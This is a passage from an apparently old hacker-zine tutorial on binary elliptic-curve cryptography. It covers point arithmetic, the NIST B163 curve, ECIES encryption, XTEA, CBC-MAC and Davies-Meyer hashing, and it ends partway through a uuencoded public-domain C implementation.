+[EllipticCurve] for some nice images.
+
+In ECC implementations it is essential to have routines for point
+addition, doubling, inversion, etc.  We present pseudocode for the
+most important ones:
+
+Let (x, y) be a point on the elliptic curve E(a, b). The point 
+(x', y') := 2 * (x, y) can be computed by
+
+   l = x + (y / x)
+   x' = l^2 + l + a
+   y' = x^2 + l*x' + x'
+   return (x', y')
+
+For two points P = (x1, y1), Q = (x2, y2) the sum (x3, y3) = P + Q
+can be computed by
+
+   l = (y2 + y1) / (x2 + x1)
+   x3 = l^2 + l + x1 + x2 + a
+   y3 = l(x1 + x3) + x3 + y1
+   return (x3, y3)
+
+Some special cases where the point at infinity 'o' has to be
+considered have been omitted here. Have a look at [PointArith] for
+complete pseudocode routines. But nevertheless we see that point
+arithmetic is easy and straight forward to implement. A handful of
+field additions, multiplications plus a single division do the job.
+
+The existence of routines that do point doubling and addition is
+sufficient to be able to build an efficient "scalar multiplier": a
+routine that multiplies a given curve point P by any given natural
+number k. The double-and-add algorithm works as follows:
+
+   H := 'o'
+   let n be the number of the highest set bit in k
+   while(n >= 0) {
+     H = 2 * H;
+     if the nth bit in k is set:
+       H = H + P;
+     n--;
+   }
+   return H;
+
+Example. Suppose you want to calculate k*P for k = 11 = 1011b. Then
+n is initialized to 3 and H calculated as 
+
+   H = 2 * (2 * (2 * (2 * 'o' + P)) + P) + P
+     = 2 * (2 * (2 * P) + P) + P
+     = 2 * (5 * P) + P
+     = 11 * P
+
+Some elliptic curves that are suitable for cryptographic purposes have
+been standardized. NIST recommends 15 curves (see [NIST]), among them
+five binary ones called B163, B233, B283, B409 and B571. The
+parameters of B163 are the following ([NISTParams]):
+
+  Field:             GF(2^163)
+  Reduction poly:    p(t) = t^163 + t^7 + t^6 + t^3 + 1
+  Coefficient a:     1
+  Coefficient b:     20a601907b8c953ca1481eb10512f78744a3205fd 
+  x coordinate of g: 3f0eba16286a2d57ea0991168d4994637e8343e36
+  y coordinate of g: 0d51fbc6c71a0094fa2cdd545b11c5c0c797324f1
+  group order:       2 * 5846006549323611672814742442876390689256843201587
+
+The field size is 2^163, the corresponding symmetric security level is
+about 80 bits (see chapter 4). The field elements are given in
+hexadecimal, the curve's order in decimal form as h * n, where h (the
+"cofactor") is small and n is a large prime number. The point g is
+chosen in a way that the subgroup generated by g has order n.
+
+The source code included in this article works with B163. It can
+easily be patched to support any other binary NIST curve; for this it
+is sufficient to alter just 6 lines.
+
+Exercise. Try it out: patch the sources to get a B409 crypto
+system. You will find the curve's parameters in [NISTParams].
+
+Read [EllipticCurve], [PointArith] and [DoubleAndAdd] for further
+information.
+
+
+
+---[ 4 - On the Security of Elliptic Curve Cryptography
+
+
+We learned that the security of the DH key exchange is based on the
+hardness of the DLP in the underlying group. Algorithms are known that
+determine discrete logarithms in arbitrary groups; for this task no
+better time complexity bound is known than that for Pollard's "Rho
+Method" ([PollardRho]):
+
+Theorem. Let G be a finite (cyclic) group. Then there exists an
+algorithm that solves DLP in approximately sqrt(|G|) steps (and low
+memory usage).
+
+For elliptic curves no DLP solving algorithm is known that performs
+better than the one mentioned above. Thus it is believed that the
+ECCDLP is "fully exponential" with regard to the bit-length of
+|G|. RSA and classical DH systems can, by contrast, be broken in
+"subexponential" time. Hence their key lengths must be larger than
+those for ECC systems to achieve the same level of security.
+
+We already saw that elliptic curves over GF(2^m) contain about 2^m
+points. Therefore DLP can be solved in about sqrt(2^m) steps, that is
+2^(m/2). We conclude that m-bit ECC systems are equivalent to
+(m/2)-bit symmetric ciphers in measures of security.
+
+The following table compares equivalent key sizes for various crypto
+systems.
+
+     ECC key size | RSA key size | DH key size | AES key size
+     -------------+--------------+-------------+-------------
+          160     |     1024     |     1024    |     (80)
+          256     |     3072     |     3072    |     128
+	  384     |     7680     |     7680    |     192
+          512     |    15360     |    15360    |     256
+
+
+
+---[ 5 - The ECIES Public Key Encryption Scheme
+
+
+Earlier we presented the DH Key Exchange and the ElGamal public key
+crypto system built on top of it. The Elliptic Curve Integrated
+Encryption Scheme (ECIES, see ANSI X9.63) is an enhancement of ElGamal
+encryption specifically designed for EC groups. ECIES provides
+measures to defeat active attacks like the one presented above.
+
+Let E be an elliptic curve of order h * n with n a large prime
+number. Let G be a subgroup of E with |G| = n. Choose a point P in G
+unequal to 'o'.
+
+We start with ECIES key generation:
+
+  Alice picks as private key a random number 'd' with 1 <= d < n;
+  She distributes the point Q := d * P as public key.
+
+If Bob wants to encrypt a message m for Alice he proceeds as follows:
+
+  1. Pick a random number 'k' with 1 <= k < n.
+  2. Compute Z = h * k * Q.
+  3. If Z = 'o' goto step 1.
+  4. Compute R = k * P.
+  5. Compute (k1, k2) = KDF(Z, R)  (see below).
+  6. Encrypt m with key k1.
+  7. Calculate the MAC of the ciphertext using k2 as MAC key.
+  8. Transmit R, the cipher text and the MAC to Alice.
+
+Alice decrypts the cipher text using the following algorithm:
+
+  1. Check that R is a valid point on the elliptic curve.
+  2. Compute Z = h * d * R.
+  3. Check Z != 'o'.
+  4. Compute (k1, k2) = KDF(Z, R)  (see below).
+  5. Check the validity of the MAC using key k2.
+  6. Decrypt m using key k1.
+
+  If any of the checks fails: reject the message as forged.
+
+KDF is a key derivation function that produces symmetric keys k1, k2
+from a pair of elliptic curve points. Just think of KDF being the
+cryptographic hash function of your choice.
+
+ECIES offers two important features:
+
+1. If an attacker injects a curve point R that does not generate a
+   large group (this is the case in the attack mentioned above), this
+   is detected in steps 2 und 3 of the decryption process (the
+   cofactor plays a fundamental role here).
+
+2. The message is not only encrypted in a secure way, it is also 
+   protected from modification by a MAC.
+
+
+Exercise. Implement a DH key exchange. Let E be a binary elliptic
+curve or order h * n. Let G be a subgroup of E with |G| = n. Choose a
+point g in G unequal to 'o'. Let Alice and Bob proceed as follows:
+
+1. Alice picks a random number 'a' with 1 <= a < n and sends P = a * g
+   to Bob.
+
+2. Bob picks a random number 'b' with 1 <= b < n and sends Q = b * g
+   to Alice.
+
+3. Alice checks that Q is a point on the curve that generates a group
+   of order n (see the ECIES_public_key_validation routine).  Alice
+   calculates S = a * Q.
+
+4. Bob checks that P is a point on the curve that generates a group of
+   ordern n. He calculates T = b * P.
+
+If everything went OK the equality S = T should hold.
+
+
+
+---[ 6 - The XTEA Block Cipher, CBC-MAC and Davies-Meyer Hashing
+
+
+XTEA is the name of a patent-free secure block cipher invented by
+Wheeler and Needham in 1997. The block size is 64 bits, keys are 128
+bits long. The main benefit of XTEA over its competitors AES, Twofish,
+etc is the compact description of the algorithm:
+
+void encipher(unsigned long m[], unsigned long key[]) 
+{
+  unsigned long sum = 0, delta = 0x9E3779B9;
+  int i;
+  for(i = 0; i < 32; i++) {
+    m[0] += ((m[1] << 4 ^ m[1] >> 5) + m[1]) ^ (sum + key[sum & 3]);
+    sum += delta;
+    m[1] += ((m[0] << 4 ^ m[0] >> 5) + m[0]) ^ (sum + key[sum >> 11 & 3]);
+  }
+}
+
+Let E be a symmetric encryption function with block length n,
+initialized with key k. The CBC-MAC of a message m is calculated as
+follows:
+
+1. Split m in n-bit-long submessages m1, m2, m3, ...
+
+2. Calculate the intermediate values t0 = E(length(m)), 
+   t1 = E(m1 XOR t0), t2 = E(m2 XOR t1), t3 = E(m3 XOR t2), ...
+
+3. Return the last value obtained in step 2 as MAC(k, m) and
+   discard t0, t1, t2, ...
+
+
+Next we show how a block cipher can be used to build a cryptographic
+hash function using the "Davies-Meyer" construction. Let m be the
+message that is to be hashed. Let E(key,block) be a symmetric
+encryption function with block length n and key length l.
+
+1. Split m in l-bit-long submessages m1, m2, m3, ...
+
+2. Calculate the intermediate values h1 = E(m1, 0), h2 = E(m2, h1) XOR
+   h1, h3 = E(m3, h2) XOR h2, ...
+
+3. If h is the last intermediate value obtained in step 2 return
+   E(length(m), h) XOR h as hash value and discard h1, h2, h3, ...
+
+The code included in this article uses the block cipher XTEA in
+counter mode (CTR) for encryption, a CBC-MAC garantees message
+authenticity; finally KDF (see chapter 5) is implemented using XTEA in
+Davies-Meyer mode.
+
+Read [XTEA] and [DMhashing] to learn more about the XTEA block cipher
+and the Davies-Meyer construction.
+
+
+
+---[ 7 - Putting Everything Together: The Source Code
+
+
+The public domain source code you find at the end of this document
+implements the ECIES public key encryption system over the curve
+B163. The code is commented, but we outline the design here.
+
+1. The central data structure is a bit vector of fixed but "long"
+   length. It is the base data type used to represent field elements
+   and suchlike. The dedicated typedef is called bitstr_t.
+   Appropriate routines for bit manipulation, shifting, bitcounting,
+   importing from an ASCII/HEX representation, etc do exist.
+
+2. The functions with "field_" prefix do the field arithmetic:
+   addition, multiplication and calculation of the multiplicative
+   inverse of elements are the important routines.
+
+3. ECC points are represented as pairs of elem_t (an alias for
+   bitstr_t), the special point-at-infinity as the pair (0,0). The
+   functions prefixed with "point_" act on elliptic curve points and
+   implement basic point operations: point addition, point doubling,
+   etc.
+
+4. The function "point_mult" implements the double-and-add algorithm
+   to compute "k * (x,y)" in the way described in chapter 3 .
+
+5. The "XTEA"-prefixed functions implement the XTEA block cipher,
+   but also the CBC-MAC and the Davies-Meyer construction.
+
+6. The "ECIES_"-routines do the ECIES related work. 
+   ECIES_generate_key_pair() generates a private/public key pair,
+   ECIES_public_key_validation() checks that a given point is
+   on the curve and generates a group of order "n".
+   ECIES_encryption/ECIES_decryption do what their names imply.
+
+7. A demonstration of the main ECIES functionalities is given in the
+   program's main() section.
+
+The code may be compiled like this:
+  
+   gcc -O2 -o ecc ecc.c
+
+
+
+---[ 8 - Conclusion
+
+
+We have seen how crypto systems are built upon algebraical groups that
+have certain properties. We further gave an introduction into a special
+class of appropriate groups and their theory, namely to the binary
+elliptic curves. Finally we presented the secure public key encryption
+scheme ECIES (together with necessary symmetrical components). All
+this is implemented in the source code included in this article.
+
+We recall that besides security the central design goal of the code
+was compactness, not speed or generality. Libraries specialized on EC
+cryptography benefit from assembler hand-coded field arithmetic 
+routines and easily perform a hundred times faster than this code.
+
+If compactness is not essential for your application you might opt for
+linking against one of the following ECC capable free crypto libraries
+instead:
+
+Crypto++ (C++)     http://www.eskimo.com/~weidai/cryptlib.html
+Mecca (C)          http://point-at-infinity.org/mecca/
+LibTomCrypt (C)    http://libtomcrypt.org/
+borZoi (C++/Java)  http://dragongate-technologies.com/products.html
+
+
+
+---[ 9 - Outlook
+
+
+You have learned a lot about elliptic curves while reading this
+article, but there still remains a bunch of unmentioned ideas. We
+list some important ones:
+
+1. Elliptic curves can be defined over other fields than binary ones.
+   Let p be a prime number and Z_p the set of nonnegative integers
+   smaller than p. Then Z_p forms a finite field (addition and
+   multiplication have to be understood modulo p, see
+   [ModularArithmetic] and [FiniteField]).
+
+   For these fields the elliptic curve E(a, b) is defined to be the
+   set of solutions of the equation
+
+                        y^2 = x^3 + ax + b
+
+   plus the point at infinity 'o'. Of course point addition and
+   doubling routines differ from that given above, but essentially
+   these "prime curves" form an algebraical group in a similar way as
+   binary curves do. It is not that prime curves are more or less
+   secure than binary curves. They just offer another class of groups
+   suitable for cryptographic purposes.
+
+   NIST recommends five prime curves: P192, P224, P256, P384 and P521.
+
+2. In this article we presented the public key encryption scheme
+   ECIES.  It should be mentioned that ECC-based signature schemes
+   (see [ECDSA]) and authenticated key establishment protocols ([MQV])
+   do also exist. The implementation is left as exercise to the
+   reader.
+
+3. Our double-and-add point multiplicator is very rudimentary.  Better
+   ones can do the "k * P" job in half the time. We just give the idea
+   of a first improvement:
+
+   Suppose we want to calculate 15 * P for a curve point P. The
+   double-and-add algorithm does this in the following way:
+
+       15 * P = 2 * (2 * (2 * (2 * 'o' + P) + P) + P) + P
+
+   This takes three point doublings and three point additions
+   (calculations concerning 'o' are not considered).
+
+   We could compute 15 * P in a cleverer fashion:
+
+       15 * P = 16 * P - P = 2 * 2 * 2 * 2 * P - P
+
+   This takes four doublings plus a single addition; hence we may
+   expect point multiplicators using this trick to be better
+   performers than the standard double-and-add algorithm. In practice
+   this trick can speed up the point multiplication by about 30%.
+
+   See [NAF] for more information about this topic.
+
+4. In implementations the most time consuming field operation is
+   always the element inversion. We saw that both the point addition
+   and the point doubling routines require one field division each.
+   There is a trick that reduces the amount of divisions in a full "k
+   * P" point multiplication to just one. The idea is to represent the
+   curve point (x,y) as triple (X,Y,Z) where x = X/Z, y = Y/Z. In this
+   "projective" representation all field divisions can by deferred to
+   the very end of the point multiplication, where they are carried
+   out in a single inversion.
+
+   Different types of coordinate systems of the projective type
+   are presented in [CoordSys].
+
+
+
+---[ A - Appendix: Literature
+
+
+A variety of interesting literature exists on elliptic curve
+cryptography. I recommend to start with [G2ECC] and [ECIC]. Other good
+references are given in [ECC].
+
+Elliptic curves and cryptographical protocols using them have been
+standardized by IEEE [P1363], ANSI (X9.62, X9.63) and SECG [SECG], to
+list just some.
+
+See [Certicom] and [ECCPrimer] for two tutorials about ECC.
+
+The best reference about classical cryptography is [HAC].
+
+[G2ECC] Hankerson, Menezes, Vanstone, "Guide to Elliptic Curve
+	Cryptography", Springer-Verlag, 2004
+	http://www.cacr.math.uwaterloo.ca/ecc/
+
+[ECIC] Blake, Seroussi, Smart, "Elliptic Curves in Cryptography",
+       Cambridge University Press, 1999
+       http://www.cambridge.org/aus/catalogue/catalogue.asp?isbn=0521653746
+
+[HAC] Menezes, Oorschot, Vanstone: "Handbook of Applied Cryptography",
+      CRC Press, 1996, http://www.cacr.math.uwaterloo.ca/hac/
+
+[Groups] http://en.wikipedia.org/wiki/Group_(mathematics)
+[Lagrange] http://en.wikipedia.org/wiki/Lagrange's_theorem
+[CyclicGroups] http://en.wikipedia.org/wiki/Cyclic_group
+[GroupTheory] http://en.wikipedia.org/wiki/Elementary_group_theory
+[DLP] http://en.wikipedia.org/wiki/Discrete_logarithm
+[DH] http://en.wikipedia.org/wiki/Diffie-Hellman
+[ElGamal] http://en.wikipedia.org/wiki/ElGamal_discrete_log_cryptosystem
+[AliceAndBob] http://en.wikipedia.org/wiki/Alice_and_Bob
+[FiniteField] http://en.wikipedia.org/wiki/Finite_field
+[FieldTheory] http://en.wikipedia.org/wiki/Field_theory_(mathematics)
+[FieldTheoryGlossary] http://en.wikipedia.org/wiki/Glossary_of_field_theory
+[FieldArithmetic] http://en.wikipedia.org/wiki/Finite_field_arithmetic
+[ModularArithmetic] http://en.wikipedia.org/wiki/Modular_arithmetic
+[ECC] http://en.wikipedia.org/wiki/Elliptic_curve_cryptography
+[EllipticCurve] http://en.wikipedia.org/wiki/Elliptic_curve
+[PointArith] http://wikisource.org/wiki/Binary_Curve_Affine_Coordinates
+[DoubleAndAdd] http://en.wikipedia.org/wiki/Exponentiation_by_squaring
+[NIST] http://csrc.nist.gov/CryptoToolkit/dss/ecdsa/NISTReCur.ps
+[NISTParams] http://wikisource.org/wiki/NIST_Binary_Curves_Parameters
+[PollardRho] http://en.wikipedia.org/wiki/
+               Pollard's_rho_algorithm_for_logarithms
+[XTEA] http://en.wikipedia.org/wiki/XTEA
+[DMhashing] http://en.wikipedia.org/wiki/Davies-Meyer_construction
+[ECDSA] http://en.wikipedia.org/wiki/Elliptic_Curve_DSA
+[MQV] http://en.wikipedia.org/wiki/MQV
+[NAF] http://en.wikipedia.org/wiki/Non-adjacent_form
+[CoordSys] http://wikisource.org/wiki/Wikisource:Cryptography
+[P1363] http://en.wikipedia.org/wiki/IEEE_P1363
+[SECG] http://en.wikipedia.org/wiki/SECG
+[Certicom] http://www.certicom.com/index.php?action=ecc,ecc_tutorial
+[ECCPrimer] http://linuxdevices.com/articles/AT7211498192.html
+
+
+
+---[ B - Appendix: Code
+
+
+$ cat ecc.c.uue
+begin 644 ecc.c
+M+RH@"B`@5&AI<R!P<F]G<F%M(&EM<&QE;65N=',@=&AE($5#2453('!U8FQI
+M8R!K97D@96YC<GEP=&EO;B!S8VAE;64@8F%S960@;VX@=&AE"B`@3DE35"!"
+M,38S(&5L;&EP=&EC(&-U<G9E(&%N9"!T:&4@6%1%02!B;&]C:R!C:7!H97(N
+M(%1H92!C;V1E('=A<R!W<FET=&5N"B`@87,@86X@86-C;VUP86YI;65N="!F
+M;W(@86X@87)T:6-L92!P=6)L:7-H960@:6X@<&AR86-K(",V,R!A;F0@:7,@
+M<F5L96%S960@=&\*("!T:&4@<'5B;&EC(&1O;6%I;BX**B\*"B-I;F-L=61E
+M(#QS=&1I;G0N:#X*(VEN8VQU9&4@/'-T9&QI8BYH/@HC:6YC;'5D92`\<W1R
+M:6YG+F@^"B-I;F-L=61E(#QF8VYT;"YH/@HC:6YC;'5D92`\=6YI<W1D+F@^
+M"B-I;F-L=61E(#QS=&1I;RYH/@HC:6YC;'5D92`\;F5T:6YE="]I;BYH/@H*
+M(V1E9FEN92!-04-23RA!*2!D;R![($$[('T@=VAI;&4H,"D*(V1E9FEN92!-
+M24XH82P@8BD@*"AA*2`\("AB*2`_("AA*2`Z("AB*2D*(V1E9FEN92!#2$%2
+M4S))3E0H<'1R*2!N=&]H;"@J*'5I;G0S,E]T*BDH<'1R*2D*(V1E9FEN92!)
+M3E0R0TA!4E,H<'1R+"!V86PI($U!0U)/*"`J*'5I;G0S,E]T*BDH<'1R*2`]
+M(&AT;VYL*'9A;"D@*0H*(V1E9FEN92!$159?4D%.1$]-("(O9&5V+W5R86YD
+M;VTB"@HC9&5F:6YE($9!5$%,*',I($U!0U)/*"!P97)R;W(H<RD[(&5X:70H
+M,C4U*2`I"@HO*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+PH*
+M(V1E9FEN92!$14=2144@,38S("`@("`@("`@("`@("`@("`@("`@("\J('1H
+M92!D96=R964@;V8@=&AE(&9I96QD('!O;'EN;VUI86P@*B\*(V1E9FEN92!-
+M05)'24X@,R`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("\J(&1O;B=T('1O=6-H('1H:7,@*B\*(V1E9FEN92!.54U73U)$4R`H
+M*$1%1U)%12`K($U!4D=)3B`K(#,Q*2`O(#,R*0H*("`@+RH@=&AE(&9O;&QO
+M=VEN9R!T>7!E('=I;&P@<F5P<F5S96YT(&)I="!V96-T;W)S(&]F(&QE;F=T
+M:"`H1$5'4D5%*TU!4D=)3BD@*B\*='EP961E9B!U:6YT,S)?="!B:71S=')?
+M=%M.54U73U)$4UT["@H@("`@("\J('-O;64@8F%S:6,@8FET+6UA;FEP=6QA
+M=&EO;B!R;W5T:6YE<R!T:&%T(&%C="!O;B!T:&5S92!V96-T;W)S(&9O;&QO
+M=R`J+PHC9&5F:6YE(&)I='-T<E]G971B:70H02P@:61X*2`H*$%;*&ED>"D@
+M+R`S,ET@/CX@*"AI9'@I("4@,S(I*2`F(#$I"B-D969I;F4@8FET<W1R7W-E
+M=&)I="A!+"!I9'@I($U!0U)/*"!!6RAI9'@I("\@,S)=('P](#$@/#P@*"AI
+M9'@I("4@,S(I("D*(V1E9FEN92!B:71S=')?8VQR8FET*$$L(&ED>"D@34%#
+M4D\H($%;*&ED>"D@+R`S,ET@)CT@?B@Q(#P\("@H:61X*2`E(#,R*2D@*0H*
+M(V1E9FEN92!B:71S=')?8VQE87(H02D@34%#4D\H(&UE;7-E="A!+"`P+"!S
+M:7IE;V8H8FET<W1R7W0I*2`I"B-D969I;F4@8FET<W1R7V-O<'DH02P@0BD@
+M34%#4D\H(&UE;6-P>2A!+"!"+"!S:7IE;V8H8FET<W1R7W0I*2`I"B-D969I
+M;F4@8FET<W1R7W-W87`H02P@0BD@34%#4D\H(&)I='-T<E]T(&@[(%P*("!B
+M:71S=')?8V]P>2AH+"!!*3L@8FET<W1R7V-O<'DH02P@0BD[(&)I='-T<E]C
+M;W!Y*$(L(&@I("D*(V1E9FEN92!B:71S=')?:7-?97%U86PH02P@0BD@*"$@
+M;65M8VUP*$$L($(L('-I>F5O9BAB:71S=')?="DI*0H*:6YT(&)I='-T<E]I
+M<U]C;&5A<BAC;VYS="!B:71S=')?="!X*0I["B`@:6YT(&D["B`@9F]R*&D@
+M/2`P.R!I(#P@3E5-5T]21%,@)B8@(2`J>"LK.R!I*RLI.PH@(')E='5R;B!I
+M(#T]($Y535=/4D13.PI]"@H@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`O*B!R971U<FX@=&AE(&YU;6)E<B!O9B!T:&4@:&EG:&5S="!O;F4M8FET
+M("L@,2`J+PII;G0@8FET<W1R7W-I>F5I;F)I=',H8V]N<W0@8FET<W1R7W0@
+M>"D*>PH@(&EN="!I.PH@('5I;G0S,E]T(&UA<VL["B`@9F]R*'@@*ST@3E5-
+M5T]21%,L(&D@/2`S,B`J($Y535=/4D13.R!I(#X@,"`F)B`A("HM+7@[(&D@
+M+3T@,S(I.PH@(&EF("AI*0H@("`@9F]R*&UA<VL@/2`Q(#P\(#,Q.R`A("@J
+M>"`F(&UA<VLI.R!M87-K(#X^/2`Q+"!I+2TI.PH@(')E='5R;B!I.PI]"@H@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M+RH@;&5F="US:&EF="!B>2`G8V]U;G0G(&1I9VET<R`J+PIV;VED(&)I='-T
+M<E]L<VAI9G0H8FET<W1R7W0@02P@8V]N<W0@8FET<W1R7W0@0BP@:6YT(&-O
+M=6YT*0I["B`@:6YT(&DL(&]F9G,@/2`T("H@*&-O=6YT("\@,S(I.PH@(&UE
+M;6UO=F4H*'9O:60J*4$@*R!O9F9S+"!"+"!S:7IE;V8H8FET<W1R7W0I("T@
+M;V9F<RD["B`@;65M<V5T*$$L(#`L(&]F9G,I.PH@(&EF("AC;W5N="`E/2`S
+M,BD@>PH@("`@9F]R*&D@/2!.54U73U)$4R`M(#$[(&D@/B`P.R!I+2TI"B`@
+M("`@($%;:5T@/2`H05MI72`\/"!C;W5N="D@?"`H05MI("T@,5T@/CX@*#,R
+M("T@8V]U;G0I*3L*("`@($%;,%T@/#P](&-O=6YT.PH@('T*?0H*("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`O*B`H<F%W
+M*2!I;7!O<G0@9G)O;2!A(&)Y=&4@87)R87D@*B\*=F]I9"!B:71S=')?:6UP
+M;W)T*&)I='-T<E]T('@L(&-O;G-T(&-H87(@*G,I"GL*("!I;G0@:3L*("!F
+M;W(H>"`K/2!.54U73U)$4RP@:2`](#`[(&D@/"!.54U73U)$4SL@:2LK+"!S
+M("L](#0I"B`@("`J+2UX(#T@0TA!4E,R24Y4*',I.PI]"@H@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@+RH@*')A=RD@
+M97AP;W)T('1O(&$@8GET92!A<G)A>2`J+PIV;VED(&)I='-T<E]E>'!O<G0H
+M8VAA<B`J<RP@8V]N<W0@8FET<W1R7W0@>"D*>PH@(&EN="!I.PH@(&9O<BAX
+M("L]($Y535=/4D13+"!I(#T@,#L@:2`\($Y535=/4D13.R!I*RLL(',@*ST@
+M-"D*("`@($E.5#)#2$%24RAS+"`J+2UX*3L*?0H*("`@("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`O*B!E>'!O<G0@87,@:&5X('-T<FEN9R`H
+M;G5L;"UT97)M:6YA=&5D(2D@*B\*=F]I9"!B:71S=')?=&]?:&5X*&-H87(@
+M*G,L(&-O;G-T(&)I='-T<E]T('@I"GL*("!I;G0@:3L*("!F;W(H>"`K/2!.
+M54U73U)$4RP@:2`](#`[(&D@/"!.54U73U)$4SL@:2LK+"!S("L](#@I"B`@
+M("!S<')I;G1F*',L("(E,#AX(BP@*BTM>"D["GT*"B`@("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@+RH@:6UP;W)T
+M(&9R;VT@82!H97@@<W1R:6YG("HO"FEN="!B:71S=')?<&%R<V4H8FET<W1R
+M7W0@>"P@8V]N<W0@8VAA<B`J<RD*>PH@(&EN="!L96X["B`@:68@*"AS6VQE
+M;B`]('-T<G-P;BAS+"`B,#$R,S0U-C<X.6%B8V1E9D%"0T1%1B(I72D@?'P*
+M("`@("`@*&QE;B`^($Y535=/4D13("H@."DI"B`@("!R971U<FX@+3$["B`@
+M8FET<W1R7V-L96%R*'@I.PH@('@@*ST@;&5N("\@.#L*("!I9B`H;&5N("4@
+M."D@>PH@("`@<W-C86YF*',L("(E,#AX(BP@>"D["B`@("`J>"`^/CT@,S(@
+M+2`T("H@*&QE;B`E(#@I.PH@("`@<R`K/2!L96X@)2`X.PH@("`@;&5N("8]
+M('XW.PH@('T*("!F;W(H.R`J<SL@<R`K/2`X*0H@("`@<W-C86YF*',L("(E
+M,#AX(BP@+2UX*3L*("!R971U<FX@;&5N.PI]"@HO*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+PH*='EP961E9B!B:71S=')?="!E;&5M7W0[
+M("`@("`@("`@("`O*B!T:&ES('1Y<&4@=VEL;"!R97!R97-E;G0@9FEE;&0@
+M96QE;65N=',@*B\*"F5L96U?="!P;VQY.R`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@+RH@=&AE(')E9'5C=&EO;B!P;VQY;F]M:6%L
+M("HO"@HC9&5F:6YE(&9I96QD7W-E=#$H02D@34%#4D\H($%;,%T@/2`Q.R!M
+M96US970H02`K(#$L(#`L('-I>F5O9BAE;&5M7W0I("T@-"D@*0H*:6YT(&9I
+M96QD7VES,2AC;VYS="!E;&5M7W0@>"D*>PH@(&EN="!I.PH@(&EF("@J>"LK
+M("$](#$I(')E='5R;B`P.PH@(&9O<BAI(#T@,3L@:2`\($Y535=/4D13("8F
+M("$@*G@K*SL@:2LK*3L*("!R971U<FX@:2`]/2!.54U73U)$4SL*?0H*=F]I
+M9"!F:65L9%]A9&0H96QE;5]T('HL(&-O;G-T(&5L96U?="!X+"!C;VYS="!E
+M;&5M7W0@>2D@("`@+RH@9FEE;&0@861D:71I;VX@*B\*>PH@(&EN="!I.PH@
+M(&9O<BAI(#T@,#L@:2`\($Y535=/4D13.R!I*RLI"B`@("`J>BLK(#T@*G@K
+M*R!>("IY*RL["GT*"B-D969I;F4@9FEE;&1?861D,2A!*2!-04-23R@@05LP
+M72!>/2`Q("D*"B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("\J(&9I96QD(&UU;'1I<&QI8V%T:6]N("HO
+M"G9O:60@9FEE;&1?;75L="AE;&5M7W0@>BP@8V]N<W0@96QE;5]T('@L(&-O
+M;G-T(&5L96U?="!Y*0I["B`@96QE;5]T(&(["B`@:6YT(&DL(&H["B`@+RH@
+M87-S97)T*'H@(3T@>2D[("HO"B`@8FET<W1R7V-O<'DH8BP@>"D["B`@:68@
+M*&)I='-T<E]G971B:70H>2P@,"DI"B`@("!B:71S=')?8V]P>2AZ+"!X*3L*
+M("!E;'-E"B`@("!B:71S=')?8VQE87(H>BD["B`@9F]R*&D@/2`Q.R!I(#P@
+M1$5'4D5%.R!I*RLI('L*("`@(&9O<BAJ(#T@3E5-5T]21%,@+2`Q.R!J(#X@
+M,#L@:BTM*0H@("`@("!B6VI=(#T@*&);:ET@/#P@,2D@?"`H8EMJ("T@,5T@
+M/CX@,S$I.PH@("`@8ELP72`\/#T@,3L*("`@(&EF("AB:71S=')?9V5T8FET
+M*&(L($1%1U)%12DI"B`@("`@(&9I96QD7V%D9"AB+"!B+"!P;VQY*3L*("`@
+M(&EF("AB:71S=')?9V5T8FET*'DL(&DI*0H@("`@("!F:65L9%]A9&0H>BP@
+M>BP@8BD["B`@?0I]"@IV;VED(&9I96QD7VEN=F5R="AE;&5M7W0@>BP@8V]N
+M<W0@96QE;5]T('@I("`@("`@("`@("`@("`@("\J(&9I96QD(&EN=F5R<VEO
+M;B`J+PI["B`@96QE;5]T('4L('8L(&<L(&@["B`@:6YT(&D["B`@8FET<W1R
+M7V-O<'DH=2P@>"D["B`@8FET<W1R7V-O<'DH=BP@<&]L>2D["B`@8FET<W1R
+M7V-L96%R*&<I.PH@(&9I96QD7W-E=#$H>BD["B`@=VAI;&4@*"$@9FEE;&1?
+M:7,Q*'4I*2!["B`@("!I(#T@8FET<W1R7W-I>F5I;F)I=',H=2D@+2!B:71S
+M=')?<VEZ96EN8FET<RAV*3L*("`@(&EF("AI(#P@,"D@>PH@("`@("!B:71S
+M=')?<W=A<"AU+"!V*3L@8FET<W1R7W-W87`H9RP@>BD[(&D@/2`M:3L*("`@
+M('T*("`@(&)I='-T<E]L<VAI9G0H:"P@=BP@:2D["B`@("!F:65L9%]A9&0H
+M=2P@=2P@:"D["B`@("!B:71S=')?;'-H:69T*&@L(&<L(&DI.PH@("`@9FEE
+M;&1?861D*'HL('HL(&@I.PH@('T*?0H*+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*B\*"B\J(%1H92!F;VQL;W=I;F<@<F]U=&EN97,@9&\@
+M=&AE($5#0R!A<FET:&UE=&EC+B!%;&QI<'1I8R!C=7)V92!P;VEN=',*("`@
+M87)E(')E<')E<V5N=&5D(&)Y('!A:7)S("AX+'DI(&]F(&5L96U?="X@270@
+M:7,@87-S=6UE9"!T:&%T(&-U<G9E"B`@(&-O969F:6-I96YT("=A)R!I<R!E
